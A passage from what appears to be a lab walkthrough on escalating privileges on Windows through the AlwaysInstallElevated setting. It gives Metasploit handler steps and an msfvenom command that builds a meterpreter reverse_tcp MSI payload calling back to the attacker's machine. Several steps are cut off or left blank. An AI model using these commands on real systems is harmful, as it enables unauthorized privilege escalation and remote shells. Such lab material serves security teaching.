2.From the output, notice that “AlwaysInstallElevated” value is 1.
3.In command prompt type:
4.From the output, notice that “AlwaysInstallElevated” value is 1.
Exploitation
Exploitation through power up
Powerup can actuallty detect it and exploit it.
Generation MSI
It will pop up and add a new user
2nd Method - Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.
Windows VM
1.Place ‘setup.msi’ in ‘C:\Temp’.
2.Open command prompt and type:
